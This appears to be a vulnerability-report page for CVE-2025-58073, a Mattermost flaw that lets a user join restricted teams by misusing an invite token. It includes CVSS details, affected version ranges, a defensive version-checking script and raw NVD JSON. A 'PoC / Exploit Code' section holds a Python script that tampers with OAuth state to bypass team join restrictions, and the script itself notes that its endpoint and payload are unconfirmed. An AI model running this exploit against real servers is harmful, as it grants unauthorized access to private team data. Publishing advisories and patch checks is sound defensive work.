Security Vulnerability Report
CVE-2025-58073 CVSS 8.1 HIGH

Published: 2025-10-16 09:15:35
Last Modified: 2025-10-21 17:51:43

Description

Mattermost versions 10.11.x <= 10.11.1, 10.10.x <= 10.10.2 and 10.5.x <= 10.5.10 fail to verify that a user has permission to join a Mattermost team using the original invite token. This allows any attacker with an account on the server to join any team, regardless of that team's join restrictions, by manipulating the OAuth state so that an invite token for one team is applied to a different team.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
(Network attack vector, low attack complexity, low privileges required, no user interaction, unchanged scope; confidentiality and integrity impact high, availability impact none. Exploitability subscore 2.8, impact subscore 5.2.)
Weakness
CWE-862 (Missing Authorization)

Configurations (Affected Products)

CPE (applies to all three ranges): cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE

Branch    Affected per description      NVD CPE match (versionStartIncluding / versionEndExcluding)
10.11.x   10.11.0 through 10.11.1       10.11.0 / 10.11.3
10.10.x   10.10.0 through 10.10.2       10.10.0 / 10.10.3
10.5.x    10.5.0 through 10.5.10        10.5.0 / 10.5.11

Note: for the 10.11 branch the NVD CPE range (everything below 10.11.3) is wider than the description (10.11.1 and earlier), so the two sources disagree about 10.11.2; confirm against the vendor advisory before marking a 10.11.2 install as patched. Branches not listed (for example 10.6 through 10.9) are absent from the record, which is not the same as being confirmed unaffected.
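To turn the ranges above into something you can run over a server inventory, here is an added example (written for this page; it is not part of the NVD record, the Mattermost project, or the page's original author). It embeds the `configurations` block copied from the Raw JSON section further down, evaluates an NVD configuration node the way NVD defines it (OR/AND over `cpeMatch` entries with the four version-bound keys, plus `negate`), and reports which range matched. The "MAJOR.MINOR.PATCH" version format is an assumption about the string you read from the server (its About dialog or the X-Version-Id response header); obtaining that string is outside the example.

```python
"""Check a Mattermost server version against the CVE-2025-58073 CPE ranges.

Added example, not NVD or Mattermost tooling. CONFIGURATIONS is copied from the
NVD record shown on this page; the version-string format is an assumption.
"""
import re

CVE_ID = "CVE-2025-58073"
CPE = "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*"

# Copied from the NVD record's "configurations" block (not constructed).
CONFIGURATIONS = [
    {"nodes": [{"operator": "OR", "negate": False, "cpeMatch": [
        {"vulnerable": True, "criteria": CPE,
         "versionStartIncluding": "10.5.0", "versionEndExcluding": "10.5.11"},
        {"vulnerable": True, "criteria": CPE,
         "versionStartIncluding": "10.10.0", "versionEndExcluding": "10.10.3"},
        {"vulnerable": True, "criteria": CPE,
         "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.3"},
    ]}]}
]


def parse_version(text):
    """Turn '10.11.1', 'v10.11.1' or '10.11.1-rc1' into a comparable (10, 11, 1)."""
    m = re.match(r"^v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(x) for x in m.groups())


def _in_range(version, match):
    """Evaluate one cpeMatch entry's bounds (the four NVD version keys)."""
    v = parse_version(version)
    lo_inc = match.get("versionStartIncluding")
    lo_exc = match.get("versionStartExcluding")
    hi_inc = match.get("versionEndIncluding")
    hi_exc = match.get("versionEndExcluding")
    if lo_inc and v < parse_version(lo_inc):
        return False
    if lo_exc and v <= parse_version(lo_exc):
        return False
    if hi_inc and v > parse_version(hi_inc):
        return False
    if hi_exc and v >= parse_version(hi_exc):
        return False
    return True


def _node_matches(node, version):
    """OR/AND over the node's vulnerable cpeMatch entries and child nodes, honouring 'negate'."""
    results = [_in_range(version, m) for m in node.get("cpeMatch", []) if m.get("vulnerable")]
    results += [_node_matches(child, version) for child in node.get("children", [])]
    if not results:
        return False
    combined = any(results) if node.get("operator", "OR") == "OR" else all(results)
    return (not combined) if node.get("negate") else combined


def is_affected(version, configurations=CONFIGURATIONS):
    """True if `version` falls inside any vulnerable range of the record."""
    return any(_node_matches(n, version) for cfg in configurations for n in cfg["nodes"])


def affected_range_for(version, configurations=CONFIGURATIONS):
    """Return the cpeMatch entry that matched, or None, so a report can cite the range."""
    for cfg in configurations:
        for node in cfg["nodes"]:
            for m in node.get("cpeMatch", []):
                if m.get("vulnerable") and _in_range(version, m):
                    return m
    return None


if __name__ == "__main__":
    for v in ["10.5.10", "10.5.11", "10.10.2", "10.10.3", "10.11.1", "10.11.2", "10.11.3", "10.9.5"]:
        hit = affected_range_for(v)
        tag = f"AFFECTED ({hit['versionStartIncluding']} <= v < {hit['versionEndExcluding']})" if hit else "not in any listed range"
        print(f"{CVE_ID}: {v}: {tag}")
```

Note the "not in any listed range" wording: a 10.9.5 install returns False here because NVD lists no range for it, not because the record says it is safe.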

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-58073 PoC - Mattermost Team Invite Token Permission Bypass
# Exploit: Manipulating OAuth state to bypass team join permission verification
import requests

TARGET_SERVER = "https://mattermost.example.com"
ATTACKER_SESSION = requests.Session()


def login_as_attacker(username, password):
    """Login to Mattermost as a low-privilege user."""
    login_url = f"{TARGET_SERVER}/api/v4/users/login"
    resp = ATTACKER_SESSION.post(
        login_url, json={"login_id": username, "password": password}, timeout=15
    )
    if resp.status_code == 200:
        # Mattermost returns the session token in the "Token" response header
        token = resp.headers.get("Token")
        ATTACKER_SESSION.headers.update({"Authorization": f"Bearer {token}"})
        print(f"[+] Logged in as: {username}")
        return True
    print(f"[-] Login failed: {resp.status_code} - {resp.text}")
    return False


def get_invite_token(team_id):
    """Obtain a valid invite token for a team (e.g., from a public channel or leaked link).

    In practice the attacker obtains the token from intercepted links, public
    posts, or shared channels. The request below is only a placeholder for that
    step; the returned value must be replaced with a captured token.
    """
    invite_url = f"{TARGET_SERVER}/api/v4/teams/{team_id}/invite_email"
    ATTACKER_SESSION.post(
        invite_url, json={"emails": ["invitee@example.com"]}, timeout=15  # placeholder address
    )
    # Extract token from response or use a captured token
    return "captured_invite_token_here"


def exploit_oauth_state_bypass(target_team_id, invite_token):
    """
    Exploit: Manipulate the OAuth state parameter to bind the invite token to an
    arbitrary restricted team, bypassing the join permission check.

    The endpoint path and payload shape are as given on this page; they are not
    confirmed against the Mattermost API reference.
    """
    # Step 1: Build the manipulated state (invite token for one team, team_id of another)
    oauth_state = {
        "token": invite_token,
        "team_id": target_team_id,  # Target restricted team
    }
    # Step 2: Send the join request carrying the manipulated state
    join_url = f"{TARGET_SERVER}/api/v4/teams/{target_team_id}/members"
    payload = {
        "team_id": target_team_id,
        "invite_token": invite_token,
        "state": oauth_state,  # Manipulated OAuth state
    }
    resp = ATTACKER_SESSION.post(join_url, json=payload, timeout=15)
    if resp.status_code == 201:
        print(f"[+] SUCCESS: Joined restricted team {target_team_id}")
        print(f"[+] Response: {resp.json()}")
        return True
    print(f"[-] Failed: {resp.status_code} - {resp.text}")
    return False


if __name__ == "__main__":
    # Login as the low-privilege attacker
    if login_as_attacker("attacker_user", "password123"):
        # Target a restricted team
        target_team = "restricted_team_id_here"
        # Obtain any valid invite token (for any team the attacker can get one for)
        token = get_invite_token("any_team_id")
        # Exploit the vulnerability
        exploit_oauth_state_bypass(target_team, token)
```

References

https://mattermost.com/security-updates (Vendor Advisory, per the NVD record below)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58073", "sourceIdentifier": "[email protected]", "published": "2025-10-16T09:15:34.863", "lastModified": "2025-10-21T17:51:42.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 10.11.x <= 10.11.1, 10.10.x <= 10.10.2, 10.5.x <= 10.5.10 fail to verify a user has permission to join a Mattermost team using the original invite token which allows any attacked to join any team on a Mattermost server regardless of restrictions via manipulating the OAuth state."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0", "versionEndExcluding": "10.5.11", "matchCriteriaId": "9A7F5FBF-4910-4376-96DF-0549BA5259AE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.10.0", "versionEndExcluding": "10.10.3", "matchCriteriaId": "409352A4-2061-42B0-B130-F6889A62025A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.3", "matchCriteriaId": "D4B91178-97CA-4799-A853-685F04C33F9E"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email 
protected]", "tags": ["Vendor Advisory"]}]}}